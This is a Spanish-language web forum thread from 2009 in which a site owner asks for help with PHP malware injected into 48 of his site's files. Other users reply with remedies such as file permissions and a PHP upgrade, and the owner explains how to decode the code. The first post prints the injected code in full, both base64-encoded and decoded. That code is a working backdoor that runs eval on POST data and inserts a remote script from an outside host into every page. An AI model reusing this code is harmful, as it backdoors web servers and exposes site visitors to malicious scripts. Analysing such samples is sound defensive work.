Foros del Web » Creando para Internet » Diseño web »

Virus en Mi sitio

Estas en el tema de Virus en Mi sitio en el foro de Diseño web en Foros del Web. Hola Colegas! Tengo un problema que por lo que he averiguado varios sitios estan sufriendo. Me han intentado hackear el sitio, me inyectaron un codigo ...
  #1 (permalink)  
Antiguo 12/10/2009, 13:57
 
Fecha de Ingreso: julio-2008
Ubicación: Neuquen
Mensajes: 143
Antigüedad: 9 años, 5 meses
Puntos: 1
Exclamación Virus en Mi sitio

Hola Colegas!

Tengo un problema que por lo que he averiguado varios sitios estan sufriendo.

Me han intentado hackear el sitio, me inyectaron un codigo Base64 que es el siguiente

Código PHP:
<?php eval(base64_decode('aWYoIWlzc2V0KCRmY2YxKSl7ZnVuY3Rpb24gZmNmKCRzKXtpZihwcmVnX21hdGNoX2FsbCgnIzxzY3JpcHQoLio/KTwvc2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF0gYXMgJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk+NSl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW15cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIycsJHYpJiYoJGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9yZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRjaF9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14+XSo/KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdIGFzICR2KWlmKHByZWdfbWF0Y2goJyMgd2lkdGhccyo9XHMqW1wnIl0/MCpbMDFdW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJiYhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZSgkdiwnIycpLicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1zdHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2RDQnpjbU05YUhSMGNEb3ZMMnR5ZVc5c1lXNHVZMjl0TDJsdFlXZGxjeTltWVhacFkyOXVMbkJvY0NBK1BDOXpZM0pwY0hRKycpLCcnLCRzKTtpZihzdHJpc3RyKCRzLCc8Ym9keScpKSRzPXByZWdfcmVwbGFjZSgnIyhccyo8Ym9keSkjbWknLCRhLidcMScsJHMpO2Vsc2VpZihzdHJwb3MoJHMsJyxhJykpJHMuPSRhO3JldHVybiAkczt9ZnVuY3Rpb24gZmNmMigkYSwkYiwkYywkZCl7Z2xvYmFsICRmY2YxOyRzPWFycmF5KCk7aWYoZnVuY3Rpb25fZXhpc3RzKCRmY2YxKSljYWxsX3VzZXJfZnVuYygkZmNmMSwkYSwkYiwkYywkZCk7Zm9yZWFjaChAb2JfZ2V0X3N0YXR1cygxKSBhcyAkdilpZigoJGE9JHZbJ25hbWUnXSk9PSdmY2YnKXJldHVybjtlbHNlaWYoJGE9PSdvYl9nemhhbmRsZXInKWJyZWFrO2Vsc2UgJHNbXT1hcnJheSgkYT09J2RlZmF1bHQgb3V0cHV0IGhhbmRsZXInP2ZhbHNlOiRhKTtmb3IoJGk9Y291bnQoJHMpLTE7JGk+PTA7JGktLSl7JHNbJGldWzFdPW9iX2dldF9jb250ZW50cygpO29iX2VuZF9jbGVhbigpO31vYl9zdGFydCgnZmNmJyk7Zm9yKCRpPTA7JGk8Y291bnQoJHMpOyRpKyspe29iX3N0YXJ0KCRzWyRpXVswXSk7ZWNobyAkc1skaV1bMV07fX19JGZjZmw9KCgkYT1Ac2V0X2Vycm9yX2hhbmRsZXIoJ2ZjZjInKSkhPSdmY2YyJyk/JGE6MDtldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUWydlJ10pKTs=')); ?>

Ya lo desencripté, y es este:

Código PHP:
if(!isset($fcf1)){function fcf($s){if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))foreach($a[0] as $v)if(preg_match('# width\s*=\s*[\'"]?0*[01][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))$s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);$s=str_replace($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL2tyeW9sYW4uY29tL2ltYWdlcy9mYXZpY29uLnBocCA+PC9zY3JpcHQ+'),'',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',$a.'\1',$s);elseif(strpos($s,',a'))$s.=$a;return $s;}function fcf2($a,$b,$c,$d){global $fcf1;$s=array();if(function_exists($fcf1))call_user_func($fcf1,$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='fcf')return;elseif($a=='ob_gzhandler')break;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('fcf');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}$fcfl=(($a[email protected]set_error_handler('fcf2'))!='fcf2')?$a:0;eval(base64_decode($_POST['e'])); 
Pero no logro entender lo que quizo hacer el hacker.

Es la segunda vez que me pasa y no se como evitar que escriban sobre mis archivos php.

Gracias.
__________________
Si vas a hacer una pregunta y nosotros nos apuramos en ayudarte, ayudanos al responder rapido. Y si encontraste la solución, posteala para que puedas ayudar a muchas otras personas.
  #2 (permalink)  
Antiguo 12/10/2009, 14:09
 
Fecha de Ingreso: septiembre-2009
Mensajes: 215
Antigüedad: 8 años, 2 meses
Puntos: 1
Respuesta: Virus en Mi sitio

¿cómo se supone que te lo inyectaron?
  #3 (permalink)  
Antiguo 12/10/2009, 14:14
 
Fecha de Ingreso: julio-2008
Ubicación: Neuquen
Mensajes: 143
Antigüedad: 9 años, 5 meses
Puntos: 1
Respuesta: Virus en Mi sitio

Mediante MySQL Inject, por lo que se, lo crearon en python
__________________
Si vas a hacer una pregunta y nosotros nos apuramos en ayudarte, ayudanos al responder rapido. Y si encontraste la solución, posteala para que puedas ayudar a muchas otras personas.
  #4 (permalink)  
Antiguo 12/10/2009, 14:35
Avatar de conkerick  
Fecha de Ingreso: febrero-2009
Ubicación: Venezuela
Mensajes: 75
Antigüedad: 8 años, 9 meses
Puntos: 2
Respuesta: Virus en Mi sitio

Debes ver que dato dejas sin limpiar, y cambiarle los permisos a los archivos a 755 creo.
  #5 (permalink)  
Antiguo 12/10/2009, 15:18
Avatar de GatorV
$this->role('moderador');
 
Fecha de Ingreso: mayo-2006
Ubicación: /home/ams/
Mensajes: 38.567
Antigüedad: 11 años, 6 meses
Puntos: 2122
Respuesta: Virus en Mi sitio

Mensaje trasladado desde PHP a Web general
  #6 (permalink)  
Antiguo 12/10/2009, 16:24
 
Fecha de Ingreso: julio-2008
Ubicación: Neuquen
Mensajes: 143
Antigüedad: 9 años, 5 meses
Puntos: 1
Exclamación Respuesta: Virus en Mi sitio

Cita:
Iniciado por conkerick Ver Mensaje
Debes ver que dato dejas sin limpiar, y cambiarle los permisos a los archivos a 755 creo.
Es que eso es justamente lo que me llama la atención los archivos que me modificaron son 48 y ninguno de ellos esta con los permisos 755 ni 777, todos ellos estan el 644. No se realmente que hacer
__________________
Si vas a hacer una pregunta y nosotros nos apuramos en ayudarte, ayudanos al responder rapido. Y si encontraste la solución, posteala para que puedas ayudar a muchas otras personas.
  #7 (permalink)  
Antiguo 14/10/2009, 17:27
 
Fecha de Ingreso: julio-2008
Ubicación: Neuquen
Mensajes: 143
Antigüedad: 9 años, 5 meses
Puntos: 1
Respuesta: Virus en Mi sitio

La solucion que encontre fue actualizar la version 4 a 5.2.0 de php. Hasta ahora sin problemas
__________________
Si vas a hacer una pregunta y nosotros nos apuramos en ayudarte, ayudanos al responder rapido. Y si encontraste la solución, posteala para que puedas ayudar a muchas otras personas.
  #8 (permalink)  
Antiguo 15/10/2009, 02:21
 
Fecha de Ingreso: julio-2009
Mensajes: 43
Antigüedad: 8 años, 4 meses
Puntos: 2
Respuesta: Virus en Mi sitio

En alguna de mis webs me insertaron un codigo similar. Como has desencriptado ese codigo?
  #9 (permalink)  
Antiguo 15/10/2009, 13:37
 
Fecha de Ingreso: julio-2008
Ubicación: Neuquen
Mensajes: 143
Antigüedad: 9 años, 5 meses
Puntos: 1
Respuesta: Virus en Mi sitio

Borricos, solo tenes que sustituir <?php eval(base64_decode('aWYoIWl, bla, bla bla
por:

<?php echo(base64_decode('aWYoIWl, bla, bla ,bla

publicarlo y te mustra el codigo.

Saludos
__________________
Si vas a hacer una pregunta y nosotros nos apuramos en ayudarte, ayudanos al responder rapido. Y si encontraste la solución, posteala para que puedas ayudar a muchas otras personas.
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 13:38.